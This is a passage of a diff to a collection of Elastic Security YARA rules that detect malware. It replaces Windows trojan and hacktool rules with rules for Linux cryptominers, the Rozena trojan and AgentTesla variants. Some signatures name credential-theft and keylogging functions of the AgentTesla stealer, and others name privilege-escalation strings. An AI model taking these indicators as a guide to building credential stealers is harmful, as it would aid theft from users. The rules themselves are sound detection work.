"https://github.com/elastic/protections-artifacts//blob/ea2f8dd3b61a7cdf2ce83ca5f06f2096bb62a494/LICENSE.txt" - hash = "a0e467aacd383727d46e766f1c45b424a6d46248118c155c22c538e8773b3ae7" - logic_hash = "1bff820ec5cc9e56e7be4b290a48628115cc1ace5e41278fa76898bf39ef893e" + source_url = "https://github.com/elastic/protections-artifacts//blob/d59600196a2d19f5ac8e25b603e811946eebe1d1/yara/rules/Linux_Cryptominer_Minertr.yar#L1-L19" + license_url = "https://github.com/elastic/protections-artifacts//blob/d59600196a2d19f5ac8e25b603e811946eebe1d1/LICENSE.txt" + hash = "f77246a93782fd8ee40f12659f41fccc5012a429a8600f332c67a7c2669e4e8f" + logic_hash = "a18e0763fe9aec6d89b39cefb872b1751727e2d88ec4733b9c8b443b83219763" score = 75 - quality = 73 + quality = 75 tags = "FILE, MEMORY" - fingerprint = "cdbafa7507cb723f20ad0c7a288750a0d95792c8fe5ceb5e48c62fd45f2ffc0b" + fingerprint = "f27e404d545f3876963fd6174c4235a4fe4f69d53fe30a2d29df9dad6d97b7f7" severity = 100 arch_context = "x86" scan_context = "file, memory" license = "Elastic License v2" - os = "windows" + os = "linux" strings: - $guid = "AEC32155-D589-4150-8FE7-2900DF4554C8" ascii wide nocase - $str0 = "LogonId=\"(\\d+)" ascii wide - $str1 = "Domain=\"(.*)\",Name=\"(.*)\"" ascii wide - $str2 = "^\\W*([a-z]:\\\\.+?(\\.exe|\\.dll|\\.sys))\\W*" ascii wide - $str3 = "KB\\d+" ascii wide - $str4 = "(^https?://.+)|(^ftp://)" ascii wide - $str5 = "[0-9A-Fa-f]{8}[-][0-9A-Fa-f]{4}[-][0-9A-Fa-f]{4}[-][0-9A-Fa-f]{4}[-][0-9A-Fa-f]{12}" ascii wide - $str6 = "(http|ftp|https|file)://([\\w_-]+(?:(?:\\.[\\w_-]+)+))([\\w.,@?^=%&:/~+#-]*[\\w@?^=%&/~+#-])?" ascii wide + $a = { 41 56 41 55 41 54 55 53 48 83 EC 78 48 89 3C 24 89 F3 89 74 } condition: - $guid or all of ($str*) + all of them } -rule ELASTIC_Windows_Hacktool_Sharpup_E5C87C9A : FILE MEMORY +rule ELASTIC_Linux_Trojan_Rozena_56651C1D : FILE MEMORY { meta: - description = "Detects Windows Hacktool Sharpup (Windows.Hacktool.SharpUp)" + description = "Detects Linux Trojan Rozena (Linux.Trojan.Rozena)" author = "Elastic Security" - id = "e5c87c9a-6b4d-49af-85d1-6bb60123c057" - date = "2022-10-20" - modified = "2022-11-24" + id = "56651c1d-548e-4a51-8f1c-e4add55ec14f" + date = "2021-01-12" + modified = "2021-09-16" reference = "https://github.com/elastic/protections-artifacts/" - source_url = "https://github.com/elastic/protections-artifacts//blob/ea2f8dd3b61a7cdf2ce83ca5f06f2096bb62a494/yara/rules/Windows_Hacktool_SharpUp.yar#L1-L25" - license_url = "https://github.com/elastic/protections-artifacts//blob/ea2f8dd3b61a7cdf2ce83ca5f06f2096bb62a494/LICENSE.txt" - hash = "45e92b991b3633b446473115f97366d9f35acd446d00cd4a05981a056660ad27" - logic_hash = "62e9aafd308aacbc7a124c707e230c5a9ffde4f6929a5feada5497e3eae7668c" + source_url = "https://github.com/elastic/protections-artifacts//blob/d59600196a2d19f5ac8e25b603e811946eebe1d1/yara/rules/Linux_Trojan_Rozena.yar#L1-L19" + license_url = "https://github.com/elastic/protections-artifacts//blob/d59600196a2d19f5ac8e25b603e811946eebe1d1/LICENSE.txt" + hash = "997684fb438af3f5530b0066d2c9e0d066263ca9da269d6a7e160fa757a51e04" + logic_hash = "a6d283b0c398cb1004defe7f5669f912112262e5aaf677ae4ca7fd15565cb988" score = 75 - quality = 73 + quality = 75 tags = "FILE, MEMORY" - fingerprint = "4c6e70b7ce3eb3fc05966af6c3847f4b7282059e05c089c20f39f226efb9bf87" + fingerprint = "a86abe550b5c698a244e1c0721cded8df17d2c9ed0ee764d6dea36acf62393de" severity = 100 arch_context = "x86" scan_context = "file, memory" license = "Elastic License v2" - os = "windows" + os = "linux" strings: - $guid = "FDD654F5-5C54-4D93-BF8E-FAF11B00E3E9" ascii wide nocase - $str0 = "^\\W*([a-z]:\\\\.+?(\\.exe|\\.bat|\\.ps1|\\.vbs))\\W*" ascii wide - $str1 = "^\\W*([a-z]:\\\\.+?(\\.exe|\\.dll|\\.sys))\\W*" ascii wide - $str2 = "SELECT * FROM win32_service WHERE Name LIKE '{0}'" ascii wide - $print_str1 = "[!] Modifialbe scheduled tasks were not evaluated due to permissions." ascii wide - $print_str2 = "[+] Potenatially Hijackable DLL: {0}" ascii wide - $print_str3 = "Registry AutoLogon Found" ascii wide + $a = { 89 E1 95 68 A4 1A 70 C7 57 FF D6 6A 10 51 55 FF D0 68 A4 AD } condition: - $guid or ( all of ($str*) and 1 of ($print_str*)) + all of them } -rule ELASTIC_Windows_Trojan_Spectralviper_43Abeeeb : FILE MEMORY +rule ELASTIC_Linux_Cryptominer_Uwamson_C42Fd06D : FILE MEMORY { meta: - description = "Detects Windows Trojan Spectralviper (Windows.Trojan.SpectralViper)" + description = "Detects Linux Cryptominer Uwamson (Linux.Cryptominer.Uwamson)" author = "Elastic Security" - id = "43abeeeb-d81a-475e-9b9e-6b6337bf2ce0" - date = "2023-04-13" - modified = "2023-05-26" - reference = "https://www.elastic.co/security-labs/elastic-charms-spectralviper" - source_url = "https://github.com/elastic/protections-artifacts//blob/ea2f8dd3b61a7cdf2ce83ca5f06f2096bb62a494/yara/rules/Windows_Trojan_SpectralViper.yar#L1-L27" - license_url = "https://github.com/elastic/protections-artifacts//blob/ea2f8dd3b61a7cdf2ce83ca5f06f2096bb62a494/LICENSE.txt" - hash = "7e35ba39c2c77775b0394712f89679308d1a4577b6e5d0387835ac6c06e556cb" - logic_hash = "976e5b5b4ba73f1b392c2f6b32a86b09b5fd9e5a3510c60b77a39f1e0d705822" + id = "c42fd06d-b9ab-4f1f-bb59-e7b49355115c" + date = "2021-01-12" + modified = "2021-09-16" + reference = "https://github.com/elastic/protections-artifacts/" + source_url = "https://github.com/elastic/protections-artifacts//blob/d59600196a2d19f5ac8e25b603e811946eebe1d1/yara/rules/Linux_Cryptominer_Uwamson.yar#L1-L19" + license_url = "https://github.com/elastic/protections-artifacts//blob/d59600196a2d19f5ac8e25b603e811946eebe1d1/LICENSE.txt" + hash = "8cfc38db2b860efcce5da40ce1e3992f467ab0b7491639d68d530b79529cda80" + logic_hash = "4ff7aad11adaae8fccb23d36fc96937ba48a5517895a742f2864ba1973f3db3a" score = 75 quality = 75 tags = "FILE, MEMORY" - fingerprint = "0e19e57e936d08f68c5580d21c2d69d451cfc11d413c6125dbdaab863b73d5c7" + fingerprint = "dac171e66289e2222cd631d616f31829f31dfeeffb34f0e1dcdd687d294f117c" severity = 100 arch_context = "x86" scan_context = "file, memory" license = "Elastic License v2" - os = "windows" + os = "linux" strings: - $a1 = { 13 00 8D 58 FF 0F AF D8 F6 C3 01 0F 94 44 24 26 83 FD 0A 0F 9C 44 24 27 4D 89 CE 4C 89 C7 48 89 D3 48 89 CE B8 } - $a2 = { 15 00 8D 58 FF 0F AF D8 F6 C3 01 0F 94 44 24 2E 83 FD 0A 0F 9C 44 24 2F 4D 89 CE 4C 89 C7 48 89 D3 48 89 CE B8 } - $a3 = { 00 8D 68 FF 0F AF E8 40 F6 C5 01 0F 94 44 24 2E 83 FA 0A 0F 9C 44 24 2F 4C 89 CE 4C 89 C7 48 89 CB B8 } - $a4 = { 00 48 89 C6 0F 29 30 0F 29 70 10 0F 29 70 20 0F 29 70 30 0F 29 70 40 0F 29 70 50 48 C7 40 60 00 00 00 00 48 89 C1 E8 } - $a5 = { 41 0F 45 C0 45 84 C9 41 0F 45 C0 EB BA 48 89 4C 24 08 89 D0 EB B1 48 8B 44 24 08 48 83 C4 10 C3 56 57 53 48 83 EC 30 8B 05 } - $a6 = { 00 8D 70 FF 0F AF F0 40 F6 C6 01 0F 94 44 24 25 83 FF 0A 0F 9C 44 24 26 89 D3 48 89 CF 48 } - $a7 = { 48 89 CE 48 89 11 4C 89 41 08 41 0F 10 01 41 0F 10 49 10 41 0F 10 51 20 0F 11 41 10 0F 11 49 20 0F 11 51 30 } - $a8 = { 00 8D 58 FF 0F AF D8 F6 C3 01 0F 94 44 24 22 83 FD 0A 0F 9C 44 24 23 48 89 D6 48 89 CF 4C 8D } + $a = { F0 4C 89 F3 48 8B 34 24 48 C1 E0 04 48 C1 E3 07 48 8B 7C 24 10 48 } condition: - 5 of them + all of them } -rule ELASTIC_Windows_Trojan_Spectralviper_368C36A0 : FILE MEMORY +rule ELASTIC_Linux_Cryptominer_Uwamson_D08B1D2E : FILE MEMORY { meta: - description = "Detects Windows Trojan Spectralviper (Windows.Trojan.SpectralViper)" + description = "Detects Linux Cryptominer Uwamson (Linux.Cryptominer.Uwamson)" author = "Elastic Security" - id = "368c36a0-d8ec-4cd6-92b3-193907898dc1" - date = "2023-05-10" - modified = "2023-05-10" - reference = "https://www.elastic.co/security-labs/elastic-charms-spectralviper" - source_url = "https://github.com/elastic/protections-artifacts//blob/ea2f8dd3b61a7cdf2ce83ca5f06f2096bb62a494/yara/rules/Windows_Trojan_SpectralViper.yar#L29-L53" - license_url = "https://github.com/elastic/protections-artifacts//blob/ea2f8dd3b61a7cdf2ce83ca5f06f2096bb62a494/LICENSE.txt" - hash = "d1c32176b46ce171dbce46493eb3c5312db134b0a3cfa266071555c704e6cff8" - logic_hash = "6182bde93e18dc6a83a94b50b193f5f29ed9abfa89b53c290818e7dab5bbb334" + id = "d08b1d2e-cbd5-420e-8f36-22b9efb5f12c" + date = "2021-01-12" + modified = "2021-09-16" + reference = "https://github.com/elastic/protections-artifacts/" + source_url = "https://github.com/elastic/protections-artifacts//blob/d59600196a2d19f5ac8e25b603e811946eebe1d1/yara/rules/Linux_Cryptominer_Uwamson.yar#L21-L39" + license_url = "https://github.com/elastic/protections-artifacts//blob/d59600196a2d19f5ac8e25b603e811946eebe1d1/LICENSE.txt" + hash = "4f7ad24b53b8e255710e4080d55f797564aa8c270bf100129bdbe52a29906b78" + logic_hash = "8f489bb020397beae91f7bce82bc1b47912deab1b79224158f79c53f1d7c7fd3" score = 75 quality = 75 tags = "FILE, MEMORY" - fingerprint = "cfe4df5390a625d59f1c30775fe26119707a296feb1a205f3df734a4c0fcc25c" + fingerprint = "1e55dc81a44af9c15b7a803e72681b5c24030d34705219f83ca4779fd885098c" severity = 100 arch_context = "x86" scan_context = "file, memory" license = "Elastic License v2" - os = "windows" + os = "linux" strings: - $a1 = { 18 48 89 4F D8 0F 10 40 20 0F 11 47 E0 0F 10 40 30 0F 11 47 F0 48 8D } - $a2 = { 24 27 48 83 C4 28 5B 5D 5F 5E C3 56 57 53 48 83 EC 20 48 89 CE 48 } - $a3 = { C7 84 C9 0F 45 C7 EB 86 48 8B 44 24 28 48 83 C4 30 5B 5F 5E C3 48 83 } - $s1 = { 40 53 48 83 EC 20 48 8B 01 48 8B D9 48 8B 51 10 48 8B 49 08 FF D0 48 89 43 18 B8 04 00 00 } - $s2 = { 40 53 48 83 EC 20 48 8B 01 48 8B D9 48 8B 49 08 FF D0 48 89 43 10 B8 04 00 00 00 48 83 C4 20 5B } - $s3 = { 48 83 EC 28 4C 8B 41 18 4C 8B C9 48 B8 AB AA AA AA AA AA AA AA 48 F7 61 10 48 8B 49 08 48 C1 EA } + $a = { 4F F8 49 8D 7D 18 89 D9 49 83 C5 20 48 89 FE 41 83 E1 0F 4D 0F } condition: - 2 of ($a*) or any of ($s*) + all of them } -rule ELASTIC_Linux_Trojan_Sdbot_98628Ea1 : FILE MEMORY +rule ELASTIC_Linux_Cryptominer_Uwamson_0797De34 : FILE MEMORY { meta: - description = "Detects Linux Trojan Sdbot (Linux.Trojan.Sdbot)" + description = "Detects Linux Cryptominer Uwamson (Linux.Cryptominer.Uwamson)" author = "Elastic Security" - id = "98628ea1-40d8-4a05-835f-a5a5f83637cb" + id = "0797de34-9181-4f28-a4b0-eafa67e20b41" date = "2021-01-12" modified = "2021-09-16" reference = "https://github.com/elastic/protections-artifacts/" - source_url = "https://github.com/elastic/protections-artifacts//blob/ea2f8dd3b61a7cdf2ce83ca5f06f2096bb62a494/yara/rules/Linux_Trojan_Sdbot.yar#L1-L19" - license_url = "https://github.com/elastic/protections-artifacts//blob/ea2f8dd3b61a7cdf2ce83ca5f06f2096bb62a494/LICENSE.txt" - hash = "5568ae1f8a1eb879eb4705db5b3820e36c5ecea41eb54a8eef5b742f477cbdd8" - logic_hash = "55b8e3fa755965b85a043015f9303644b8e06fe8bfdc0e2062de75bdc2881541" + source_url = "https://github.com/elastic/protections-artifacts//blob/d59600196a2d19f5ac8e25b603e811946eebe1d1/yara/rules/Linux_Cryptominer_Uwamson.yar#L41-L59" + license_url = "https://github.com/elastic/protections-artifacts//blob/d59600196a2d19f5ac8e25b603e811946eebe1d1/LICENSE.txt" + hash = "e4699e35ce8091f97decbeebff63d7fa8c868172a79f9d9d52b6778c3faab8f2" + logic_hash = "7ab5dd99d8bbef61ec764900df5bebf39ed90833a8f9481c427cbb46faf2c521" score = 75 quality = 75 tags = "FILE, MEMORY" - fingerprint = "15cf6b916dd87915738f3aa05a2955c78a357935a183c0f88092d808535625a5" + fingerprint = "b6a210c23f09ffa0114f12aa741be50f234b8798a3275ac300aa17da29b8727c" severity = 100 arch_context = "x86" scan_context = "file, memory" @@ -57783,59 +58642,57 @@ rule ELASTIC_Linux_Trojan_Sdbot_98628Ea1 : FILE MEMORY os = "linux" strings: - $a = { 54 00 3C 08 54 00 02 00 26 00 00 40 4D 08 00 5C 00 50 00 49 00 } + $a = { 43 20 48 B9 AB AA AA AA AA AA AA AA 88 44 24 30 8B 43 24 89 44 } condition: all of them } -rule ELASTIC_Windows_Trojan_Nimplant_44Ff3211 : FILE MEMORY +rule ELASTIC_Linux_Cryptominer_Uwamson_41E36585 : FILE MEMORY { meta: - description = "Detects Windows Trojan Nimplant (Windows.Trojan.Nimplant)" + description = "Detects Linux Cryptominer Uwamson (Linux.Cryptominer.Uwamson)" author = "Elastic Security" - id = "44ff3211-1ba6-4c46-a990-b2419d88367e" - date = "2023-06-23" - modified = "2023-07-10" + id = "41e36585-0ef1-4896-a887-dac437c716a5" + date = "2021-01-12" + modified = "2021-09-16" reference = "https://github.com/elastic/protections-artifacts/" - source_url = "https://github.com/elastic/protections-artifacts//blob/ea2f8dd3b61a7cdf2ce83ca5f06f2096bb62a494/yara/rules/Windows_Trojan_Nimplant.yar#L1-L21" - license_url = "https://github.com/elastic/protections-artifacts//blob/ea2f8dd3b61a7cdf2ce83ca5f06f2096bb62a494/LICENSE.txt" - hash = "b56e20384f98e1d2417bb7dcdbfb375987dd075911b74ea7ead082494836b8f4" - logic_hash = "ee519d8d722404ed440b385d283a41921bc34ee11f0e7273cdc074b377494c39" + source_url = "https://github.com/elastic/protections-artifacts//blob/d59600196a2d19f5ac8e25b603e811946eebe1d1/yara/rules/Linux_Cryptominer_Uwamson.yar#L61-L79" + license_url = "https://github.com/elastic/protections-artifacts//blob/d59600196a2d19f5ac8e25b603e811946eebe1d1/LICENSE.txt" + hash = "8cfc38db2b860efcce5da40ce1e3992f467ab0b7491639d68d530b79529cda80" + logic_hash = "e176523afe8c3394ddda41a5ef11f825fed1e149476709a7c1ea26b8af72d4fc" score = 75 quality = 75 tags = "FILE, MEMORY" - fingerprint = "cb7f823b1621e49ffac42e8a3f90ca7f8bac7ae108ca20b9a0884548681d1f87" + fingerprint = "ad2d4a46b9378c09b1aef0f2bf67a990b3bacaba65a5b8c55c2edb0c9a63470d" severity = 100 arch_context = "x86" scan_context = "file, memory" license = "Elastic License v2" - os = "windows" + os = "linux" strings: - $a1 = "@NimPlant v" - $a2 = ".Env_NimPlant." - $a3 = "NimPlant.dll" + $a = { F8 03 48 C1 FF 03 4F 8D 44 40 FD 48 0F AF FE 49 01 F8 4C 01 C2 4C } condition: - 2 of them + all of them } -rule ELASTIC_Windows_Hacktool_Sharpmove_05E28928 : FILE MEMORY +rule ELASTIC_Windows_Trojan_Agenttesla_D3Ac2B2F : FILE MEMORY { meta: - description = "Detects Windows Hacktool Sharpmove (Windows.Hacktool.SharpMove)" + description = "Detects Windows Trojan Agenttesla (Windows.Trojan.AgentTesla)" author = "Elastic Security" - id = "05e28928-6109-4afe-bd86-908d354ddd80" - date = "2022-11-20" - modified = "2023-01-11" - reference = "https://github.com/elastic/protections-artifacts/" - source_url = "https://github.com/elastic/protections-artifacts//blob/ea2f8dd3b61a7cdf2ce83ca5f06f2096bb62a494/yara/rules/Windows_Hacktool_SharpMove.yar#L1-L23" - license_url = "https://github.com/elastic/protections-artifacts//blob/ea2f8dd3b61a7cdf2ce83ca5f06f2096bb62a494/LICENSE.txt" - hash = "051f60f9f4665b96f764810defe9525ae7b4f9898249b83a23094cee63fa0c3b" - logic_hash = "021a56dd47d9929e71b82b00d24aa8969a31945681dcf414c69b8d175fb0b6eb" + id = "d3ac2b2f-14fc-4851-8a57-41032e386aeb" + date = "2021-03-22" + modified = "2022-06-20" + reference = "https://www.elastic.co/security-labs/attack-chain-leads-to-xworm-and-agenttesla" + source_url = "https://github.com/elastic/protections-artifacts//blob/d59600196a2d19f5ac8e25b603e811946eebe1d1/yara/rules/Windows_Trojan_AgentTesla.yar#L1-L58" + license_url = "https://github.com/elastic/protections-artifacts//blob/d59600196a2d19f5ac8e25b603e811946eebe1d1/LICENSE.txt" + hash = "65463161760af7ab85f5c475a0f7b1581234a1e714a2c5a555783bdd203f85f4" + logic_hash = "9c13a99107593d476de1522ced10aa43d34535b844e8c3ae871b22358137c926" score = 75 quality = 73 tags = "FILE, MEMORY" - fingerprint = "634efb2dedbb181a31ea41ff34d1d0810d1ab4823c8611737d68cb56601a052d" + fingerprint = "cbbb56fe6cd7277ae9595a10e05e2ce535a4e6bf205810be0bbce3a883b6f8bc" severity = 100 arch_context = "x86" scan_context = "file, memory" @@ -57843,32 +58700,66 @@ rule ELASTIC_Windows_Hacktool_Sharpmove_05E28928 : FILE MEMORY os = "windows" strings: - $guid = "8BF82BBE-909C-4777-A2FC-EA7C070FF43E" ascii wide nocase - $print_str0 = "[X] Failed to connecto to WMI: {0}" ascii wide fullword - $print_str1 = "[+] Executing DCOM ShellBrowserWindow : {0}" ascii wide fullword - $print_str2 = "[+] User credentials : {0}" ascii wide fullword - $print_str3 = "[+] Executing DCOM ExcelDDE : {0}" ascii wide fullword + $a1 = "GetMozillaFromLogins" ascii fullword + $a2 = "AccountConfiguration+username" wide fullword + $a3 = "MailAccountConfiguration" ascii fullword + $a4 = "KillTorProcess" ascii fullword + $a5 = "SmtpAccountConfiguration" ascii fullword + $a6 = "GetMozillaFromSQLite" ascii fullword + $a7 = "Proxy-Agent: HToS5x" wide fullword + $a8 = "set_BindingAccountConfiguration" ascii fullword + $a9 = "doUsernamePasswordAuth" ascii fullword + $a10 = "SafariDecryptor" ascii fullword + $a11 = "get_securityProfile" ascii fullword + $a12 = "get_useSeparateFolderTree" ascii fullword + $a13 = "get_DnsResolver" ascii fullword + $a14 = "get_archivingScope" ascii fullword + $a15 = "get_providerName" ascii fullword + $a16 = "get_ClipboardHook" ascii fullword + $a17 = "get_priority" ascii fullword + $a18 = "get_advancedParameters" ascii fullword + $a19 = "get_disabledByRestriction" ascii fullword + $a20 = "get_LastAccessed" ascii fullword + $a21 = "get_avatarType" ascii fullword + $a22 = "get_signaturePresets" ascii fullword + $a23 = "get_enableLog" ascii fullword + $a24 = "TelegramLog" ascii fullword + $a25 = "generateKeyV75" ascii fullword + $a26 = "set_accountName" ascii fullword + $a27 = "set_InternalServerPort" ascii fullword + $a28 = "set_bindingConfigurationUID" ascii fullword + $a29 = "set_IdnAddress" ascii fullword + $a30 = "set_GuidMasterKey" ascii fullword + $a31 = "set_username" ascii fullword + $a32 = "set_version" ascii fullword + $a33 = "get_Clipboard" ascii fullword + $a34 = "get_Keyboard" ascii fullword + $a35 = "get_ShiftKeyDown" ascii fullword + $a36 = "get_AltKeyDown" ascii fullword + $a37 = "get_Password" ascii fullword + $a38 = "get_PasswordHash" ascii fullword + $a39 = "get_DefaultCredentials" ascii fullword condition: - $guid or all of ($print_str*) + 8 of ($a*) } -rule ELASTIC_Windows_Trojan_Revengerat_Db91Bcc6 : FILE MEMORY +rule ELASTIC_Windows_Trojan_Agenttesla_E577E17E : FILE MEMORY { meta: - description = "Detects Windows Trojan Revengerat (Windows.Trojan.Revengerat)" + description = "Detects Windows Trojan Agenttesla (Windows.Trojan.AgentTesla)" author = "Elastic Security" - id = "db91bcc6-024d-42da-8d0a-bd69374bf622" - date = "2021-09-02" - modified = "2022-01-13" - reference = "https://github.com/elastic/protections-artifacts/" - source_url = "https://github.com/elastic/protections-artifacts//blob/ea2f8dd3b61a7cdf2ce83ca5f06f2096bb62a494/yara/rules/Windows_Trojan_Revengerat.yar#L1-L22" - license_url = "https://github.com/elastic/protections-artifacts//blob/ea2f8dd3b61a7cdf2ce83ca5f06f2096bb62a494/LICENSE.txt" - hash = "30d8f81a19976d67b495eb1324372598cc25e1e69179c11efa22025341e455bd" - logic_hash = "1e33cb1d614aae0b2181ebaca694c69e7fc849b3a3b7ffff7059e8c43553f8cc" + id = "e577e17e-5c42-4431-8c2d-0c1153128226" + date = "2022-03-11" + modified = "2022-04-12" + reference = "https://www.elastic.co/security-labs/attack-chain-leads-to-xworm-and-agenttesla" + source_url = "https://github.com/elastic/protections-artifacts//blob/d59600196a2d19f5ac8e25b603e811946eebe1d1/yara/rules/Windows_Trojan_AgentTesla.yar#L60-L79" + license_url = "https://github.com/elastic/protections-artifacts//blob/d59600196a2d19f5ac8e25b603e811946eebe1d1/LICENSE.txt" + hash = "ed43ddb536e6c3f8513213cd6eb2e890b73e26d5543c0ba1deb2690b5c0385b6" + logic_hash = "84c5f1096735cee0f0f4ad41a81286c0a60dc17c276f23568b855271d996c8a2" score = 75 - quality = 50 + quality = 75 tags = "FILE, MEMORY" - fingerprint = "9c322655f50c32b9be23accd2b38fbda43c280284fbf05a5a5c98458c2bab666" + fingerprint = "009cb27295a1aa0dde84d29ee49b8fa2e7a6cec75eccb7534fec3f5c89395a9d" severity = 100 arch_context = "x86" scan_context = "file, memory" @@ -57876,31 +58767,28 @@ rule ELASTIC_Windows_Trojan_Revengerat_Db91Bcc6 : FILE MEMORY os = "windows" strings: - $a1 = "Revenge-RAT" wide fullword - $a2 = "SELECT * FROM FirewallProduct" wide fullword - $a3 = "HKEY_CURRENT_USER\\SOFTWARE\\" wide fullword - $a4 = "get_MachineName" ascii fullword + $a = { 20 4D 27 00 00 33 DB 19 0B 00 07 17 FE 01 2C 02 18 0B 00 07 } condition: all of them } -rule ELASTIC_Windows_Trojan_Flawedgrace_8C5Eb04B : FILE MEMORY +rule ELASTIC_Windows_Trojan_Agenttesla_F2A90D14 : FILE MEMORY { meta: - description = "Detects Windows Trojan Flawedgrace (Windows.Trojan.FlawedGrace)" + description = "Detects Windows Trojan Agenttesla (Windows.Trojan.AgentTesla)" author = "Elastic Security" - id = "8c5eb04b-301b-4d05-a010-3329e5b764c6" - date = "2023-11-01" - modified = "2023-11-02" - reference = "https://github.com/elastic/protections-artifacts/" - source_url = "https://github.com/elastic/protections-artifacts//blob/ea2f8dd3b61a7cdf2ce83ca5f06f2096bb62a494/yara/rules/Windows_Trojan_FlawedGrace.yar#L1-L23" - license_url = "https://github.com/elastic/protections-artifacts//blob/ea2f8dd3b61a7cdf2ce83ca5f06f2096bb62a494/LICENSE.txt" - hash = "966112f3143d751a95c000a990709572ac8b49b23c0e57b2691955d6fda1016e" - logic_hash = "dc07197cb9a02ff8d271f78756c2784c74d09e530af20377a584dbfe77e973aa" + id = "f2a90d14-7212-41a5-a2cd-a6a6dedce96e" + date = "2022-03-11" + modified = "2022-04-12" + reference = "https://www.elastic.co/security-labs/attack-chain-leads-to-xworm-and-agenttesla" + source_url = "https://github.com/elastic/protections-artifacts//blob/d59600196a2d19f5ac8e25b603e811946eebe1d1/yara/rules/Windows_Trojan_AgentTesla.yar#L81-L100" + license_url = "https://github.com/elastic/protections-artifacts//blob/d59600196a2d19f5ac8e25b603e811946eebe1d1/LICENSE.txt" + hash = "ed43ddb536e6c3f8513213cd6eb2e890b73e26d5543c0ba1deb2690b5c0385b6" + logic_hash = "3f39b773f2b1524b05d3c1d9aa1fb54594ec9003d2e9da342b6d17ba885f5a03" score = 75 quality = 75 tags = "FILE, MEMORY" - fingerprint = "46ce025974792cdefe9d4f4493cee477c0eaf641564cd44becd687c27d9e7c30" + fingerprint = "829c827069846ba1e1378aba8ee6cdc801631d769dc3dce15ccaacd4068a88a6" severity = 100 arch_context = "x86" scan_context = "file, memory" @@ -57908,32 +58796,28 @@ rule ELASTIC_Windows_Trojan_Flawedgrace_8C5Eb04B : FILE MEMORY os = "windows" strings: - $a1 = "Grace finalized, no more library calls allowed." ascii fullword - $a2 = ".?AVReadThread@TunnelIO@NS@@" ascii fullword - $a3 = ".?AVTunnelClientDirectIO@NS@@" ascii fullword - $a4 = ".?AVWireClientConnectionThread@NS@@" ascii fullword - $a5 = ".?AVWireParam@NS@@" ascii fullword + $a = { 0B FE 01 2C 0B 07 16 7E 08 00 00 04 A2 1F 0C 0C 00 08 1F 09 FE 01 } condition: - 3 of them + all of them } -rule ELASTIC_Windows_Trojan_Legionloader_F91120C6 : FILE MEMORY +rule ELASTIC_Windows_Trojan_Agenttesla_A2D69E48 : FILE MEMORY { meta: - description = "Detects Windows Trojan Legionloader (Windows.Trojan.LegionLoader)" + description = "Detects Windows Trojan Agenttesla (Windows.Trojan.AgentTesla)" author = "Elastic Security" - id = "f91120c6-395d-4c47-acd2-49c7eb1b8013" - date = "2024-06-05" - modified = "2024-06-12" - reference = "https://github.com/elastic/protections-artifacts/" - source_url = "https://github.com/elastic/protections-artifacts//blob/ea2f8dd3b61a7cdf2ce83ca5f06f2096bb62a494/yara/rules/Windows_Trojan_LegionLoader.yar#L1-L19" - license_url = "https://github.com/elastic/protections-artifacts//blob/ea2f8dd3b61a7cdf2ce83ca5f06f2096bb62a494/LICENSE.txt" - hash = "45670ffa9b24542ae84e3c9eb5ce609c2bcd29129215a7f37eb74b6211e32b22" - logic_hash = "760402587a9ca3d3e6602fe57d3346ea6f60ba5c8d3a902bf493233baab597b0" + id = "a2d69e48-b114-4128-8c2f-6fabee49e152" + date = "2023-05-01" + modified = "2023-06-13" + reference = "https://www.elastic.co/security-labs/attack-chain-leads-to-xworm-and-agenttesla" + source_url = "https://github.com/elastic/protections-artifacts//blob/d59600196a2d19f5ac8e25b603e811946eebe1d1/yara/rules/Windows_Trojan_AgentTesla.yar#L102-L122" + license_url = "https://github.com/elastic/protections-artifacts//blob/d59600196a2d19f5ac8e25b603e811946eebe1d1/LICENSE.txt" + hash = "edef51e59d10993155104d90fcd80175daa5ade63fec260e3272f17b237a6f44" + logic_hash = "1f90be86b7afa7f518a3dcec55028bfc915cf6d4fed1350a56e351946cc55f41" score = 75 quality = 75 tags = "FILE, MEMORY" - fingerprint = "81476a8981ca0dbd7ac32073d6dc4362ae251ff06827c120e902f1aa3a53ce68" + fingerprint = "bd46dd911aadf8691516a77f3f4f040e6790f36647b5293050ecb8c25da31729" severity = 100 arch_context = "x86" scan_context = "file, memory" @@ -57941,150 +58825,163 @@ rule ELASTIC_Windows_Trojan_Legionloader_F91120C6 : FILE MEMORY os = "windows" strings: - $a = { 55 8B EC 83 EC 08 89 4D F8 8B 4D F8 E8 4F 01 00 00 0F B6 C0 85 C0 75 09 C7 45 FC 01 00 00 00 EB 07 C7 45 FC 00 00 00 00 0F B6 45 FC 8B E5 5D C3 55 8B EC 51 89 4D FC 8B 4D FC E8 21 01 00 00 8B } + $a1 = { 00 03 08 08 10 08 10 18 09 00 04 08 18 08 10 08 10 18 0E 00 08 } + $a2 = { 00 06 17 5F 16 FE 01 16 FE 01 2A 00 03 30 03 00 B1 00 00 00 } condition: all of them } -rule ELASTIC_Linux_Exploit_Sorso_Ecf99F8F : FILE MEMORY +rule ELASTIC_Windows_Trojan_Agenttesla_Ebf431A8 : FILE MEMORY { meta: - description = "Detects Linux Exploit Sorso (Linux.Exploit.Sorso)" + description = "Detects Windows Trojan Agenttesla (Windows.Trojan.AgentTesla)" author = "Elastic Security" - id = "ecf99f8f-1692-41ee-a70d-8c868e269529" - date = "2021-04-06" - modified = "2021-09-16" - reference = "https://github.com/elastic/protections-artifacts/" - source_url = "https://github.com/elastic/protections-artifacts//blob/ea2f8dd3b61a7cdf2ce83ca5f06f2096bb62a494/yara/rules/Linux_Exploit_Sorso.yar#L1-L19" - license_url = "https://github.com/elastic/protections-artifacts//blob/ea2f8dd3b61a7cdf2ce83ca5f06f2096bb62a494/LICENSE.txt" - hash = "c0f0a7b45fb91bc18264d901c20539dd32bc03fa5b7d839a0ef5012fb0d895cd" - logic_hash = "c771ff109e548e37134cd76ac668f0d4abafcf262de12b00236ad94fc11a99d1" + id = "ebf431a8-45e8-416c-a355-4ac1db2d133a" + date = "2023-12-01" + modified = "2024-01-12" + reference = "https://www.elastic.co/security-labs/attack-chain-leads-to-xworm-and-agenttesla" + source_url = "https://github.com/elastic/protections-artifacts//blob/d59600196a2d19f5ac8e25b603e811946eebe1d1/yara/rules/Windows_Trojan_AgentTesla.yar#L124-L148" + license_url = "https://github.com/elastic/protections-artifacts//blob/d59600196a2d19f5ac8e25b603e811946eebe1d1/LICENSE.txt" + hash = "0cb3051a80a0515ce715b71fdf64abebfb8c71b9814903cb9abcf16c0403f62b" + logic_hash = "b02d6e2d68b336aaa37336e0c0c3ffa6c7a126bfcdb6cb6ad5a3432004c6030c" score = 75 quality = 75 tags = "FILE, MEMORY" - fingerprint = 